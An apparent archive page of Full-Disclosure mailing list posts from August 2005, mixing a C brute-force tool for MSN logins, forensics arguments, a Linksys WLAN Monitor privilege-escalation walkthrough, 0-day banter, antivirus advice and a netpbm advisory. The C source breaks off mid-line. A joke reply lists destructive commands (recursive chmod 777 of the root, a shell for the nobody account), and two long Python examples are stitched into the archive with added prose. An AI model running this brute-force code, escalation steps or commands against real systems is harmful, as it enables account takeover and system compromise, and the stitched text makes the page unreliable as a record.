[EMAIL PROTECTED]


[Full-disclosure] msn passwd checker C# source

2005-08-10 Thread ad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

:)

/*
C:\>msn_fuzzer [EMAIL PROTECTED] testpasswd
[.] Resolving.: messenger.hotmail.com = 65.54.239.140
[.] Connected.: 207.46.4.25:1863
[.] HTTPS.: unauthorized (login/passwd)
[.] Disconnection..

C:\>msn_fuzzer [EMAIL PROTECTED] testpasswd -v
[.] Resolving.: messenger.hotmail.com
[.] Resolving.: messenger.hotmail.com = 65.54.239.140
[.] Connecting: 65.54.239.140:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: 207.46.4.33:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: challenge string OK
[.] HTTPS.: unauthorized (login/passwd)
[.] Disconnection..

C:\>msn_fuzzer [EMAIL PROTECTED] testpasswd -vv
[.] Resolving.: messenger.hotmail.com
[.] Resolving.: messenger.hotmail.com = 65.54.239.140
[.] Connecting: 65.54.239.140:1863
[.] Connected.: 65.54.239.140:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: buffer #1
[.] Connected.: buffer #2
[.] Connected.: buffer #3
[.] Transferred...: 207.46.4.92:1863
[.] Connected.: 207.46.4.92:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: buffer #1
[.] Connected.: buffer #2
[.] Connected.: buffer #3
[.] Connected.: challenge string OK
[.] HTTPS.: subconnection #1 (nexus.passport.com)
[.] HTTPS.: retrieving login server
[.] HTTPS.: retrieving login server (success)
[.] HTTPS.: subconnection #2 (loginnet.passport.com)
[.] HTTPS.: retrieving hash ticket
[.] HTTPS.: unauthorized (login/passwd)
[.] Disconnection..

C:\>msn_fuzzer 207.46.4.92 1863 [EMAIL PROTECTED] testpasswd -vv
[.] Connecting: 207.46.4.92:1863
[.] Connected.: 207.46.4.92:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: buffer #1
[.] Connected.: buffer #2
[.] Connected.: buffer #3
[.] Connected.: challenge string OK
[.] HTTPS.: subconnection #1 (nexus.passport.com)
[.] HTTPS.: retrieving login server
[.] HTTPS.: retrieving login server (success)
[.] HTTPS.: subconnection #2 (loginnet.passport.com)
[.] HTTPS.: retrieving hash ticket
[.] HTTPS.: unauthorized (login/passwd)
[.] Disconnection..

etc,etc..

The C code might be used to fuzz some MSN clients, bruteforce, etc,
etc...

demonstration:

http://class101.org/MSN_fuzzer.zip
*/
#include 
#include 
#include 
#include 
#include 
#include 
#pragma comment(lib, "ws2_32")
#pragma comment(lib, "mpr")
#pragma comment(lib, "wininet")

void ver(),usage(),error(),foot(),done(SOCKET s);
int vb1=0,vb2=0,port,i,j,l00p=0;
char *ar0,*ar1,*ar2,*ar3,*ar4,*ar5,*one,*pwd,*mail,mail_[128],mail__[128],newip[15],newport[5];
hostent* one_;
WSADATA wsadata;

int engine1(char *one,int port,char *mail,int argc);

int main(int argc,char *argv[])
{
 ver();

ar0=argv[0],ar1=argv[1],ar2=argv[2],ar3=argv[3],ar4=argv[4],ar5=argv[5];
 if (argc==1){usage();return 0;}
 if ((argc==3||argc==4&&(stricmp(ar3,"-v")==0||stricmp(ar3,"-vv")==0))&&strchr(ar1,0x40)!=0||
     (argc==5||argc==6&&(stricmp(ar5,"-v")==0||stricmp(ar5,"-vv")==0))&&atoi(ar2)>0&&atoi(ar2)<=65535&&strlen(ar1)>7&&strchr(ar3,0x40)!=0)
 {
  if (argc==4&&stricmp(ar3,"-v")==0||argc==6&&stricmp(ar5,"-v")==0)
   vb1++;
  else if (argc==4&&stricmp(ar3,"-vv")==0||argc==6&&stricmp(ar5,"-vv")==0)
   vb2++;
  printf("\n"); //I feel maniak I know :s
  if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){
   if (vb2!=0)
printf("[.] WSA Initialization Error (%d)\n",WSAGetLastError());
   printf("[.] Aborting..\n");
   return -1;
  }
  if (argc==3||argc==4){
   one="messenger.hotmail.com";
   mail=ar1;pwd=ar2;
  }else{
   one=ar1;
   mail=ar3;pwd=ar4;}
  for (i=0,j=0;mail[i]!=64;i++,j++){memset(mail_+j,mail[i],1);}
  for (i=i+1,j=0;mail[i]!=0;i++,j++){memset(mail__+j,mail[i],1);}
  if (one[strlen(one)-1] == '\n')
   one[strlen(one)-1] = '\0';
  if (isalpha(one[0]))
  {
   if (vb1!=0||vb2!=0)
printf("[.] Resolving.: %s\n",one);
   one_=gethostbyname(one);
   if (one_==0)
   {
if (vb2!=0)
 printf("[.] Resolving.: ERROR (%d)\n",WSAGetLastError());
printf("[.] Aborting..\n");
return -1;
   }else{
printf("[.] Resolving.: %s = %s\n",one,inet_ntoa(*((struct in_addr *)one_->h_addr_list[0])));
   }
   one=inet_ntoa(*((struct in_addr *)one_->h_addr_list[0]));
   port=1863;
   if (vb1!=0||vb2!=0)
printf("[.] Connecting: %s:%d\n",one,port);
  }
  else
  {
   port=atoi(ar2);
   if (vb1!=0||vb2!=0)
printf("[.] Connecting: %s:%d\n",one,port);
  }
  engine1(one,port,mail,argc);
 }
 else {
  error();return -1;}
 return 0;
}

int engine1(char *one,int port,char *mail,int argc)
{
 SOCKET s;fd_set mask1,mask2;
 struct timeval timeout,timeout2;
 struct sockaddr_in server;
loop:
 unsigned long flag=1;
 server.sin_family=AF_INET;
 if (l00p!=0)
 {
  server.sin_addr.s_addr=inet_addr(newip);
  server.sin_port=htons(atoi(newport));
 }
 else
 {
  server.sin_addr.s_addr=inet

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Thierry Zoller
Dear Jason Coombs,

JC> Come on, do you even understand what a Trojan is?
JC> By definition, the Trojan gives a third-party the ability to control the
JC> computer from a remote location.
Well, duh, no. In fact a Trojan Horse means that the program does other
things than it indicates (ex: pretends to be a game, runs a virus). What you refer
to is a backdoor. A backdoor can be a Trojan, and a Trojan can be a Backdoor,
but the link is not logically necessary.


Or in better English :
A computer trojan horse is a program which appears to be something good,
but actually conceals something bad.


Regards,
Thierry Zoller
mailto:[EMAIL PROTECTED]




[Full-disclosure] DNSCON 8, Blackpool 12-14th August 2005 Update

2005-08-10 Thread Manchester 2600
The 2005 DNSCON event is running this weekend

Further details have now been posted to http://www.dnscon.org

Friday 12th August to Sunday 14th August 2005, Imperial Hotel
Blackpool.

This is the eighth running of the UK's longest running 'open'
information security event, for everyone with an interest in computer
security, telephony, hacking, phone phreaking, cryptography, internet
security/privacy issues and related subjects.

As usual they will have a range of speakers along with alternative
events to make a fun weekend.


[Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Jason Coombs

anonymous wrote:
> I know when running EnCase or some other software you can see the
> cookies of the machine. More importantly, you can see what "search
> items" the individual was searching for.



No, you cannot. You can see what the Internet Explorer history files 
contain. This does not prove that a person typed search terms into 
Google. If you'd like me to prove this to you, ship your computer to me. 
I will ship it back to you and it will contain proof that you are a 
very, very bad person.



> So I can tell if the person had the intent or at least give some ammo to
> the prosecution that the perp was searching for "z" and "" etc.


No you can't. You can tell that the Internet Explorer history files 
contain data.



> So if their entire defense is that a trojan put the kiddie porn on their
> machine yet their search items were things related to that sort of thing
> then we can show that the perp was searching for related topics.


Come on, do you even understand what a Trojan is?

By definition, the Trojan gives a third-party the ability to control the 
computer from a remote location. I'm not suggesting that the Trojan was 
programmed to plant evidence. I'm saying that a third-party was in 
control of the computer and any data that you see on the computer's hard 
drive, including things that you seem to think "prove" that a person 
typed on the attached keyboard, reflects, at best, the actions of many 
people and a lot of software -- and at worst the data are meaningless 
because the files have been tampered with on purpose by a third party.


> But I do believe that once an analysis of the perp's hard drive has been
> done said examiner should be able to determine if the information on the
> machine was from the surfing habits of the perp, or if they may have
> come from a trojan. Besides, if a trojan was present it should still be
> there when the examiner is looking at the system!


No. The analyst can only determine that the computer may have been 
executing software in the past at various purported times (based on 
date/time stamps) -- or, maybe what you can determine is that the 
computer has been receiving files from elsewhere, and the date/time 
stamps don't have any connection whatsoever to the local computer but 
have some connection to another computer. Furthermore, Trojan infections 
come and go, and you probably know that remote exploitable 
vulnerabilities make it unnecessary to plant a Trojan -- if the 
attacker/intruder is only interested in gaining control of the computer 
one time, and a victim comes along with a vulnerable IE browser, then 
arbitrary code can be executed and no Trojan infection will necessarily 
result. That's up to the attacker. Nevertheless, the arbitrary code 
execution resulted in the attacker being able to do anything they want 
with the computer, including launch IE and visit Web sites and enter 
search terms which IE will log.


> However, if the information came from an email, cd, diskette or other
> media then it's going to open a whole other can of worms.


It's not a can of worms for a CD or diskette to be found alongside a 
computer, that's called reasonable circumstantial evidence. Computer 
data stored on hard drives connected to the Internet is NOT reasonable 
circumstantial evidence. It's just data.


The "circumstances" under which data come to be on a hard drive are 
UNKNOWN unless law enforcement have established appropriate forensic 
controls to monitor computer operation during an investigation.


When the circumstances of software execution on a computer and the data 
communications to and from a computer are UNKNOWN, all data from that 
computer should be excluded from use in court as "evidence" of anything.


Sincerely,

Jason Coombs
[EMAIL PROTECTED]


Re: [Full-disclosure] Insecure http pages referencing https form-actions.

2005-08-10 Thread fd
On Wed, 10 Aug 2005, Leandro Meiners wrote:

> There was a lnnng discussion about this at
> [EMAIL PROTECTED] mailing list, check out the first mail at the
> archives at
> http://www.securityfocus.com/archive/107/402824/30/390/threaded
> 
> There is even a "Hall of shame" at http://AmirHerzberg.com/shame.html.

Wow... The hall of shame is great for a laugh.  -- Thanks Leandro!



[Full-disclosure] Re: Operation Site-Key computer forensic searches ruled illegal

2005-08-10 Thread Jason Coombs

Tharp, Robert wrote:

> ok. i understand now. that's very interesting. in the marine's case, did you
> actually prove that had happened? or did you just raise enough doubt that
> the prosecutors dropped the case.


The defendant's credit card number was definitely intercepted by a third 
party by way of the keylogger. There was no doubt about that. The child 
pornography found on the hard drive was entirely within the unallocated 
clusters, meaning that at some point in the past there had most likely 
been a few digital photos on the computer in the active filesystem, but 
that those files were no longer found alongside the other files and 
folders within the active filesystem.


One possible explanation for these circumstances is that the photos were 
saved to the computer's hard drive by Internet Explorer as Temporary 
Internet Files. We don't know for sure, and can't know for sure, that 
this was the case because once a file is deleted and its entries in the 
FAT or MFT (portion of hard drive in which Windows stores the list of 
files and folders that are on the drive) are overwritten with other data 
it is impossible to know what folder the file had previously been stored 
within. So, we have to look at other factors -- we usually don't even 
have a filename of the deleted file in this case, we only have the 
digital photograph data; and a forensic technique called a "carve" has 
to be performed to scrape the digital photograph data out of the 
unallocated clusters starting from the beginning of the photograph data.


If you carve child pornography out of unallocated clusters on a hard 
drive that belonged to a suspect whose credit card number appeared in 
the site-key database, you don't have to be a rocket scientist to 
conclude that, reasonably, the two circumstances are probably connected.


The flaw in this whole thought process is in attributing those two 
connected events to a person just because the person is the owner of 
both, given that there was a Trojan infection AND a keylogger installed 
it was proved conclusively that somebody else had control of the 
suspect's computer, and therefore had control of the suspect's identity.


However, this is not the way that forensic examiners write their 
forensic examination reports. So-called "computer forensic examiners" 
including those who work for the DOD Computer Forensics Lab (DCFL) who 
did work in the Pearl Harbor case simply report what they find. They 
don't offer interpretations. They don't even point out what should seem 
obvious: that a Trojan and a keylogger are present BECAUSE somebody else 
was in control of the computer via the Internet. Not as a result of some 
virus or worm that automatically infected the defendant's computer 
without a human intruder guiding them to do so.


This is a subtle but critical distinction ... My job has always been to 
offer expert opinion testimony. This is what I do in the cases that I am 
hired to work on. Despite being expert in law, judges and attorneys 
often do not understand the difference between a computer forensic 
examination report authored by a computer forensics lab and opinion 
testimony; my Pearl Harbor testimony revolved around the need for a 
civilian expert who could review the forensic examination and offer 
critique and opinion as to the meaning and reliability of the 
circumstantial evidence in linking the defendant to the crime.


In all other fields of forensics the forensic technician or criminalist 
offers an opinion along with their report of findings. In every case 
that I've worked on and every case that I've read transcripts and 
researched where "computer forensics" serves as a source of evidence 
against the accused, the information found on the suspect's hard drive 
is represented to be proof of the actions of the owner of the hard 
drive. When asked questions like "couldn't somebody else have been 
sitting at the keyboard?" the forensic examiner will answer "yes" -- 
you'd be surprised how often this question doesn't get asked by the 
defense attorney -- but then say something like "but I found the data 
associated with the defendant's user account". The forensic examiner is 
the master of twisting the evidence to fit the accusation because there 
is always a way to look at the data that makes the data tell the story 
you want it to tell. Because the forensic examiners don't offer opinion 
testimony, indeed they are not qualified to offer opinions in most cases 
because they simply do not understand the computer programming that 
caused the electronic evidence to exist.


The only forensic examiner who I have encountered who was a former 
software developer was actually not skilled as a programmer of Windows 
operating system or data communications software like the software he 
typically testifies about -- rather, he was a database programmer who 
used dBase to create databases and the programming instructions that 
would put data in and get data out of the databases. Perh
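The carve the post describes, written out as an added example; this is not Jason Coombs' code and not a DCFL or EnCase routine. It scans a constructed blob standing in for unallocated clusters, walks the JPEG marker segments from each start-of-image so that a thumbnail embedded in an EXIF (APP1) segment is neither reported as a second picture nor mistaken for the end of the first, and returns only offsets, lengths and hashes. That is all a carve can yield: the picture data. Name, folder and timestamps lived in the FAT/MFT entries that were overwritten, exactly as the post says. The filler bytes and the two synthetic photos are constructed here and are not real images.

```python
"""Signature carving of JPEG data from unallocated space (added example, constructed input)."""
import hashlib
import random
from dataclasses import dataclass
from typing import List, Optional

SOI = b"\xff\xd8\xff"   # JPEG start-of-image, always followed by another marker byte


@dataclass
class CarvedObject:
    """What a carve can tell you: where the data sat, how long it was, and its hash.
    No filename, no folder, no MAC times: those were directory metadata, not picture data."""
    offset: int
    length: int
    sha1: str


def jpeg_length(blob: bytes, start: int) -> Optional[int]:
    """Walk JPEG marker segments from the SOI at `start`; return the total length up to and
    including EOI, or None if the bytes are not a well-formed JPEG (a chance SOI in filler)."""
    n = len(blob)
    i = start + 2                                  # skip FF D8
    while i + 2 <= n:
        if blob[i] != 0xFF:
            return None
        marker = blob[i + 1]
        if marker == 0xFF:                         # fill byte, allowed before a marker
            i += 1
            continue
        if marker == 0xD9:                         # EOI: picture complete
            return i + 2 - start
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # standalone markers (TEM, RSTn)
            i += 2
            continue
        if i + 4 > n:
            return None
        seg_len = int.from_bytes(blob[i + 2:i + 4], "big")
        if seg_len < 2:
            return None
        i += 2 + seg_len                           # skips a whole APPn segment, embedded thumbnail included
        if marker == 0xDA:                         # SOS: entropy-coded data until a real marker
            while i + 1 < n:
                if blob[i] == 0xFF and blob[i + 1] != 0x00 and not 0xD0 <= blob[i + 1] <= 0xD7:
                    break                          # EOI, or the next segment of a progressive file
                i += 1
            else:
                return None
    return None


def carve_jpegs(blob: bytes) -> List[CarvedObject]:
    """Find every SOI, validate the structure, and emit one CarvedObject per complete picture."""
    found: List[CarvedObject] = []
    pos = 0
    while (start := blob.find(SOI, pos)) != -1:
        length = jpeg_length(blob, start)
        if length is None:                         # false positive: advance one byte and keep scanning
            pos = start + 1
            continue
        data = blob[start:start + length]
        found.append(CarvedObject(start, length, hashlib.sha1(data).hexdigest()))
        pos = start + length                       # never rescan inside a picture (its thumbnail has its own SOI)
    return found


# ---- constructed sample data, standing in for unallocated clusters ----------------------

def make_jpeg(entropy: bytes, embedded: bytes = b"") -> bytes:
    """Build a structurally valid (not viewable) JPEG: SOI, optional APP1 carrying `embedded`
    the way EXIF carries a thumbnail, a minimal SOS header, byte-stuffed entropy data, EOI."""
    out = b"\xff\xd8"
    if embedded:
        app1 = b"Exif\x00\x00" + embedded
        out += b"\xff\xe1" + (len(app1) + 2).to_bytes(2, "big") + app1
    sos = b"\x01\x01\x00\x00\x3f\x00"
    out += b"\xff\xda" + (len(sos) + 2).to_bytes(2, "big") + sos
    out += entropy.replace(b"\xff", b"\xff\x00")   # byte stuffing: FF inside image data is always FF 00
    return out + b"\xff\xd9"


def build_unallocated_space(seed: int = 7) -> bytes:
    """Two deleted photos among overwritten filler; the first carries an EXIF thumbnail."""
    rng = random.Random(seed)

    def filler(k: int) -> bytes:                   # never emits 0xFF, so the filler holds no markers
        return bytes(rng.randrange(255) for _ in range(k))

    thumb = make_jpeg(b"thumb" * 8)                # 54 bytes
    photo_a = make_jpeg(filler(300), embedded=thumb)   # 378 bytes, thumbnail inside APP1
    photo_b = make_jpeg(filler(500))               # 514 bytes
    return filler(1000) + photo_a + filler(700) + photo_b + filler(400)


if __name__ == "__main__":
    for obj in carve_jpegs(build_unallocated_space()):
        print(f"offset={obj.offset:6d} length={obj.length:5d} sha1={obj.sha1}")
```

On a real case you would feed `carve_jpegs` the unallocated clusters extracted from the forensic image; the result is picture data with a byte offset and a hash, which on its own says nothing about which folder, which program or which person put it there.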

Re: [Full-disclosure] Insecure http pages referencing https form-actions.

2005-08-10 Thread [EMAIL PROTECTED]
On Wed, 10 Aug 2005 [EMAIL PROTECTED] wrote:

> > The victim would then be logged in to where they expected to be, complete
> > with padlock.  Except for the extra "please wait" page, this would not be
> > obvious to a user.  My issue is with the insecure location of the actual
> >  and I have seen many sites which do this (including major financial
> > institutions).
> 
> It appears the key part of the scenario is DNS poisoning. Anytime a
> user goes to a http page to click on a login link, DNS poisoning will
> work without regard to whether the login page is secure or unsecure. 
> (For example, I go to a FI's main page at http://www.fi.com, which DNS
> poisoning points to an evil server.  The evil server sends back a page
> that looks and acts like the FI's main page, but contains a link to an
> evil login page).  The same scenario can occur when any page in a
> click stream going to a login page is hijacked.
> 
> Are you suggesting that ALL FI pages that either contain login links
> or could be in a click stream to login pages be served https:??

Absolutely.  Assuming you trust the CA which issued the certificate for
the https server, this problem is resolved by forcing all click-stream
pages (especially login pages) to be under TLS.  Even if you dns poison an
https server, where would you point it?  Unless you have the issuing CA's
key it would be at least 128bits of NP-hard cracking to keep from getting
the "this server is not signed by a known CA bla bla bla" message from the
browser.

This isn't perfect, mind you.  Users will invariably click the go-dammit
button to get what they are looking for, even if the go-dammit button
warns them that their bank will melt down if they continue:  This web page
will self destruct in 27...26...

-Eric


-- 
Eric Wheeler 
Vice President 
National Security Concepts, Inc. PO Box
3567 Tualatin, OR 97062

http://www.nsci.us/
Voice: (503) 293-7656
Fax:   (503) 885-0770

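The check for the problem this thread is about, as an added example that is not part of any poster's code: it parses a page with Python's html.parser, finds every form that collects a password, and reports those that are not protected from the first byte to the last. A login form delivered over http with an https action is the case the thread names, and the first rule encodes Eric's point that the page carrying the form must itself be under TLS; the scanner also flags the reverse (an https page posting to http). The pages for www.fi.com, login.fi.com and legacy.fi.com are constructed here and are not real sites, and the parser does not evaluate JavaScript, which a real assessment would also have to consider.

```python
"""Audit login forms for mixed http/https delivery (added example, constructed pages)."""
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect (action, collects_password) for every <form> on a page."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Tuple[str, bool]] = []
        self._open: Optional[List] = None           # [action, has_password] of the form being parsed

    def handle_starttag(self, tag: str, attrs) -> None:
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._open = [a.get("action", ""), False]
        elif tag == "input" and self._open is not None and a.get("type", "text").lower() == "password":
            self._open[1] = True

    def handle_endtag(self, tag: str) -> None:
        if tag == "form" and self._open is not None:
            self.forms.append((self._open[0], self._open[1]))
            self._open = None


def audit_login_forms(page_url: str, html: str) -> List[Dict[str, str]]:
    """One finding per password form that is not protected end to end.

    Rule 1 (the thread's point): if the page carrying the form was not delivered over https,
    an https action is no protection; whoever can rewrite the page (DNS poisoning, an on-path
    attacker) can rewrite the action or add a script that reads the field.
    Rule 2: an https page whose form posts to an http action sends the credential in clear.
    """
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    page_scheme = urlsplit(page_url).scheme.lower()
    findings: List[Dict[str, str]] = []
    for action, has_password in parser.forms:
        if not has_password:
            continue                                 # search boxes, newsletters: out of scope
        target = urljoin(page_url, action) if action else page_url
        target_scheme = urlsplit(target).scheme.lower()
        if page_scheme != "https":
            problem = ("page delivered over http; https action offers no protection"
                       if target_scheme == "https" else "page and action both over http")
        elif target_scheme != "https":
            problem = "https page posts credentials to an http action"
        else:
            continue
        findings.append({"page": page_url, "action": target, "problem": problem})
    return findings


# ---- constructed sample pages (not real sites) -----------------------------------------

FRONT_PAGE_HTTP = """
<html><body>
<form action="/search" method="get"><input name="q"></form>
<form action="https://login.fi.com/auth" method="post">
  <input name="user"><input type="password" name="pass"><input type="submit">
</form>
<form action="/newsletter" method="post"><input type="email" name="addr"></form>
</body></html>
"""

LEGACY_PAGE_HTTPS = """
<html><body>
<form action="http://legacy.fi.com/login" method="post">
  <input name="user"><input type="PASSWORD" name="pw">
</form>
<form method="post"><input type="password" name="pw2"></form>
</body></html>
"""


def demo() -> List[Dict[str, str]]:
    """Run both constructed pages through the audit and return the findings."""
    return (audit_login_forms("http://www.fi.com/", FRONT_PAGE_HTTP)
            + audit_login_forms("https://www.fi.com/account", LEGACY_PAGE_HTTPS))


if __name__ == "__main__":
    for f in demo():
        print(f"{f['page']} -> {f['action']}: {f['problem']}")
```

Pointed at a real site, the same audit is run against every page a user can click through on the way to the login, not only the login page itself; a clean result on the login page alone is exactly the false comfort the thread warns about.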


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Michael Holstein
> > [EMAIL PROTECTED]:~$
> > who runs the site?
> > I want access
>
> You need to hack into it, obviously.

#chmod -R 777 /*
#passwd -s /bin/sh nobody
#ifconfig -a |mail -s "hack me" full-disclosure@lists.grok.org.uk


Re: [Full-disclosure] Antivirus

2005-08-10 Thread Sergio López C.
In my experience I can only say:
Norton: is excellent for handling physical clusters on a hard disk; as an
antivirus, NO WAY.
BitDefender: was excellent when it was in the hands of Kaspersky Labs, the
Russian company, with very good on-time vaccination; now it is delayed one
week or more in providing good protection and disinfection tools.
NOW the best results for me:
Using Windows: www.pandasoftware.com (Titanium, Platinum, Business Secure and
TruPrevent)
Using Linux: the classic Icelandic www.f-prot.com

Sergio L.C.


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Bethune
Sent: Wednesday, August 10, 2005 12:21 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Antivirus

> I know this is not really the place to ask this question but I need some
> professional advice and well you guys know a lot. I need to get rid of our
> current Antivirus solution in the small 20+ user network we have running on
> SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
> new version of Norton 10.0? Should I look at Trend Micro? Both seem to be
> priced about the same for Canadian customers. I hope this is not too way off
> topic but I don't post here very often. If you can give me some advice that
> would be greatly appreciated.
> Jason

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread milw0rm Inc.
Ill take your cash for 0day ;P

/str0ke

On 8/10/05, Ahmad N <[EMAIL PROTECTED]> wrote:
> Hi there, 
>   
> I'm looking for the best 0-day exploit source, a source I can really count 
> on for the newest and most reliable exploits. 
>   
> can anybody suggest a website??? 
>   
> Thx 


[Full-disclosure] Privilege escalation in Linksys WLAN Monitor v2.0.

2005-08-10 Thread Reed Arvin
Summary:
Privilege escalation in Linksys WLAN Monitor v2.0 (http://www.linksys.com/)

Details:
The Linksys WLAN Monitor service (WLSVC) that is used to configure
settings for various Linksys wireless network cards runs under the
context of the LocalSystem account. It is possible to manipulate the
administrative interface of the Linksys WLAN Monitor and escalate
privileges to that of the LocalSystem account.

Vulnerable Versions:
Linksys WLAN Monitor v2.0 (for the WUSB54G wireless NIC and possibly
other wireless NICs)

Patches/Workarounds:
The vendor was notified of the issue. There was no response as to
whether or not a patch/fix would be released.

Exploits:

1. Right click on the Linksys Wireless Network Monitor in the lower right corner
   of the screen and click Open the Monitor.

2. Click the Profiles tab and click Import.

3. Right click on the Open button and click What's This?

4. Right click on the help text that is shown in yellow and click Print Topic.

5. Right click on any printer and click Open.

6. Click Help, Help Topics.

7. Right click in the right side of the help screen and click View Source.

8. Notepad will appear (running under the context of the LocalSystem account).
   Click File, click Open.

9. Change Files of type: to All Files, navigate to the system32 directory and
   locate cmd.exe. Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the LocalSystem
account.

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Crg
o/

Im root on this box (kinoko), pliz give me ur credit card and I will allow
you to fetch the 0days...

Gay Panda Crew 4life!!

- Original Message - 
From: "Javi Polo" <[EMAIL PROTECTED]>
To: 
Sent: Wednesday, August 10, 2005 1:56 PM
Subject: Re: [Full-disclosure] The best 0-day exploit source


> On Aug/10/2005, [EMAIL PROTECTED] wrote:
>
> > >can anybody suggest a website???
> > http://127.0.0.1/0-d-Xpl0iz
>
> [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
>=> `0-d-Xpl0iz'
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.
>
> [EMAIL PROTECTED]:~$
>
> who runs the site?
> I want access
>
> -- 
> Javier Polo @ Datagrama
> 902 136 126


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Mike Hoye
On Wed, Aug 10, 2005 at 01:56:04PM +0200, Javi Polo wrote:
> Connecting to 127.0.0.1:80... connected.
> HTTP request sent, awaiting response... 403 Forbidden
> 13:55:05 ERROR 403: Forbidden.
> 
> [EMAIL PROTECTED]:~$ 
> who runs the site?
> I want access

You need to hack into it, obviously.


-- 
"When you get to the end zone, you should act like you've been there
before." - Jim Thorpe


Re: [Full-disclosure] perfect security architecture (network)

2005-08-10 Thread C0BR4
Hi All,

The point that I want to make is "just make it simple". If I can work
with what I've got, why do I have to invest?

If no tool provides 100% security, why not invest a little money in an
awareness program, policy design and especially restricting users from
unnecessary applications.

thank you all for your valuable comments

C0br4


Re: [Full-disclosure] "responsible disclosure" explanation (an

2005-08-10 Thread bugtraq
> iss forgot it's handling of the apache chunk bug:
> http://www.derkeiler.com/Mailing-Lists/ISS/2002-06/0009.html
> quote:
> --
> ISS X-Force deals with all vendors on a case-by-case basis
> to provide maximum protection for **our customers** and the community. 
> --


Last I checked Gobbles found this exploit and ISS simply reported it being 
exploited in the wild. 
Of course they are going to alert their *paying customers* before alerting the 
public mailing lists. 

- zeno
http://www.cgisecurity.com

> 
> -- 
> where do you want bill gates to go today?
> 
> On Tue, Aug 09, 2005 at 07:04:23PM -0400, Ingevaldson, Dan (ISS Atlanta) 
> wrote:
> > Just in case anyone is interested, the ISS Vulnerability Disclosure
> > Guidelines were made public a couple years ago, and last revised on July
> > 15, 2004.  The document is available here:
> > 


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread bugtraq
Network: Efnet
Channel: #darknet
Nick: dvdman 

:p 


> Hi there,
>  I'm looking for the best 0-day exploit source, a source I can really count
> on for the newest and most reliable exploits.
>  can anybody suggest a website???
>  Thx


RE: [Full-disclosure] Antivirus

2005-08-10 Thread Sean Milheim \(iDREUS Corporation\)
I second BitDefender. Updates are fast and I have never noticed it eating up
CPU.

Regards,
Sean Milheim
iDREUS Corporation

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Chuck Fullerton
Sent: Wednesday, August 10, 2005 12:42 PM
To: 'Jason Bethune'; full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

> One word. BitDefender.
>
> more words... New version coming out next week! Not as expensive as
> Symantec. Faster updates..
>
> www.bitdefender.us
>
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Bethune
> Sent: Wednesday, August 10, 2005 12:21 PM
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Antivirus
>
> > I know this is not really the place to ask this question but I need some
> > professional advice and well you guys know a lot. I need to get rid of our
> > current Antivirus solution in the small 20+ user network we have running on
> > SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
> > new version of Norton 10.0? Should I look at Trend Micro? Both seem to be
> > priced about the same for Canadian customers. I hope this is not too way off
> > topic but I don't post here very often. If you can give me some advice that
> > would be greatly appreciated.
> > Jason

[Full-disclosure] MDKSA-2005:133 - Updated netpbm packages fix temporary file vulnerabilities

2005-08-10 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   netpbm
 Advisory ID:MDKSA-2005:133
 Date:   August 9th, 2005

 Affected versions:  10.0, 10.1, 10.2, Corporate 3.0,
 Corporate Server 2.1
 __

 Problem Description:

 Max Vozeler discovered that pstopnm, a part of the netpbm graphics
 utility suite, would call the GhostScript interpreter on untrusted
 PostScript files without using the -dSAFER option when converting a
 PostScript file into a PBM, PGM, or PNM file.  This could result in
 the execution of arbitrary commands with the privileges of the user
 running pstopnm if they could be convinced to try to convert a
 malicious PostScript file.
 
 The updated packages have been patched to correct this problem.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2471
  http://secunia.com/advisories/16184/
 __

 Updated Packages:
  
 Mandrakelinux 10.0:
 7bb710a56342cc78170bb74b37f512b0  10.0/RPMS/libnetpbm9-9.24-8.2.100mdk.i586.rpm
 7f820a3e8fcfaa705c0164cfd1b7a5c0  
10.0/RPMS/libnetpbm9-devel-9.24-8.2.100mdk.i586.rpm
 3de55337645f009ed8e951b3e97b9507  
10.0/RPMS/libnetpbm9-static-devel-9.24-8.2.100mdk.i586.rpm
 d32febe43b6b19ca7a3189b41de6d53c  10.0/RPMS/netpbm-9.24-8.2.100mdk.i586.rpm
 7d2bdf5636955adc39bfe13c4c581858  10.0/SRPMS/netpbm-9.24-8.2.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 04a7546fef5edfa604cdfd1e3dff1bc2  
